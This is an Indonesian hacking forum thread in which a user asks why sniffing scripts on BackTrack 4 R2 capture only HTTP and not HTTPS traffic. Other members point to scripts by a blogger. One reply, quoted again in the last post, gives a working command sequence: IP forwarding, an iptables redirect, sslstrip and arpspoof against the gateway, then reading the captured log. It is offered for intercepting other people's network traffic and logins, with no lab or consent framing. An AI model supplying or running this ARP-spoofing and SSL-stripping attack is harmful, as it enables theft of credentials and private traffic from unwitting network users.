Ngebahas Sniffing Lagi yuk...
#1
Hallo kawan2... , permisi bang momod...
setelah vakum ada 1th lebih , akhirnya kangen juga sama Forum ini..
Mohon di bantu...
saya baru coba lagi sniffing menggunakan scriptnya Bang Zee
tapi kenapa ya yang terdeteksi cuman Http ja.., untuk yg https kok gak mau muncul.., mohon kawan2 yang tahu solusinya, di share kemari.., aq uda coba muter2 di forum ini kok kayaknya lum ada penyelesainnya..
,
aq menggunakan BT4 R2

Thanks kawan....
mohon aq di bantu ya.. :-D

#2
tools om zee yang eghartz kan maksudnya om? kok ane bisa deh hehehe

#3
(07-01-2012, 06:32 PM)xsan-lahci Wrote: tools om zee yang eghartz kan maksudnya om? kok ane bisa deh hehehe

yang ane pake yang hack.sh mas...
kalo yang eghartz yg mana ya mas???, boleh saya tahu link discusinya??,
Thanks mas

#4
ini om
http:///http://zeestuff.wordpress.com/20...ng-script/

#5
(07-01-2012, 07:07 PM)xsan-lahci Wrote: ini om
http:///http://zeestuff.wordpress.com/20...ng-script/
ikutan

Perumahan Manado

#6
iya bro..., ane gunain egharts.sh
tapi yag ketangkep ,kok cuma Http ja ya??., mungkin ada sholusi dari kawan2...,
tolang ya mas...
Thanks
yg https kok ndak bisa ya??, apa yg salah ya mas??

#7
search disini coba om sniff.sh Big Grin work di BT4R2

#8
(07-01-2012, 09:27 PM)xsan-lahci Wrote: search disini coba om sniff.sh Big Grin work di BT4R2

iya bro.., klo sniff.sh aq uda nyoba bro..., hasilnya tetep bro...., adakah solusi dari kawan2 lain???
tolong banget ni bro...
Thaqnks bro...

#9
kalo sniffing sih ... biasanya cuman pake command2 dibawah ini sih !!!
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sslstrip
arpspoof -i [interface] [ip_gateway]
itu aja sih biasanya !

tinggal di tunggu aja data yg di capture ama sslstrip
Code:
tail -f sslstrip.log

#10
(07-01-2012, 11:45 PM)RR12 Wrote: kalo sniffing sih ... biasanya cuman pake command2 dibawah ini sih !!!
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sslstrip
arpspoof -i [interface] [ip_gateway]
itu aja sih biasanya !

tinggal di tunggu aja data yg di capture ama sslstrip
Code:
tail -f sslstrip.log

ada tutorial step - step nya mas???, itu BT4 R2 bisa ya??, nangkep jaringan Https ya??





Users browsing this thread: 1 Guest(s)